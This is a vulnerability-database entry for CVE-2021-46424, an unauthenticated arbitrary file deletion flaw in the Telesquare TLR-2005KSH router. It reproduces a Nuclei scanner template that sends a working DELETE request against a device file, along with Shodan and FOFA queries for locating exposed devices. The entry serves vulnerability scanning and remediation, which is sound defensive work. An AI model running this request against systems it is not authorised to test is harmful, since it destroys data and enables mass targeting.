Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2021-46424
HistoryMay 17, 2022 - 5:35 a.m.

Telesquare TLR-2005KSH 1.0.0 - Arbitrary File Delete

2022-05-1705:35:45
ProjectDiscovery
github.com
11
telesquare
tlr-2005ksh
arbitrary file delete
cve-2021
intrusive
packetstorm

CVSS2

9.4

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:N/I:C/A:C

CVSS3

9.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

NONE

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H

AI Score

9.1

Confidence

High

EPSS

0.015

Percentile

86.9%

Telesquare TLR-2005KSH 1.0.0 is affected by an arbitrary file deletion vulnerability that allows a remote attacker to delete any file, even system internal files, via a DELETE request.

id: CVE-2021-46424

info:
  name: Telesquare TLR-2005KSH 1.0.0 - Arbitrary File Delete
  author: gy741
  severity: critical
  description: Telesquare TLR-2005KSH 1.0.0 is affected by an arbitrary file deletion vulnerability that allows a remote attacker to delete any file, even system internal files, via a DELETE request.
  impact: |
    Successful exploitation could lead to loss of critical data or system instability.
  remediation: |
    Apply the latest patch or update provided by the vendor to fix the vulnerability.
  reference:
    - https://dl.packetstormsecurity.net/2205-exploits/tlr2005ksh-filedelete.txt
    - https://drive.google.com/drive/folders/1_e3eJ8fzhCWnCkoRpbLoyQecuKkPR4OD?usp=sharing
    - http://packetstormsecurity.com/files/167127/TLR-2005KSH-Arbitrary-File-Delete.html
    - https://nvd.nist.gov/vuln/detail/CVE-2021-46424
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H
    cvss-score: 9.1
    cve-id: CVE-2021-46424
    cwe-id: CWE-306
    epss-score: 0.0159
    epss-percentile: 0.86024
    cpe: cpe:2.3:o:telesquare:tlr-2005ksh_firmware:1.0.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: telesquare
    product: tlr-2005ksh_firmware
    shodan-query:
      - http.html:"TLR-2005KSH"
      - http.html:"tlr-2005ksh"
    fofa-query: body="tlr-2005ksh"
  tags: cve2021,cve,telesquare,intrusive,packetstorm

http:
  - raw:
      - |
        GET /images/icons_title.gif HTTP/1.1
        Host: {{Hostname}}
      - |
        DELETE /images/icons_title.gif HTTP/1.1
        Host: {{Hostname}}
      - |
        GET /images/icons_title.gif HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - "status_code_1 == 200 && status_code_2 == 204 && status_code_3 == 404"
# digest: 490a00463044022068767c775db28fe6384f139340712299dc9fee5a2da3ea49fccbeb875603957802201ada10d866a7cbbd00fd43fd1a0218c5a29ed8e579f948d4f4d376bd7e02d12a:922c64590222798bb761d5b6d8e72950

CVSS2

9.4

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:N/I:C/A:C

CVSS3

9.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

NONE

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H

AI Score

9.1

Confidence

High

EPSS

0.015

Percentile

86.9%

Related for NUCLEI:CVE-2021-46424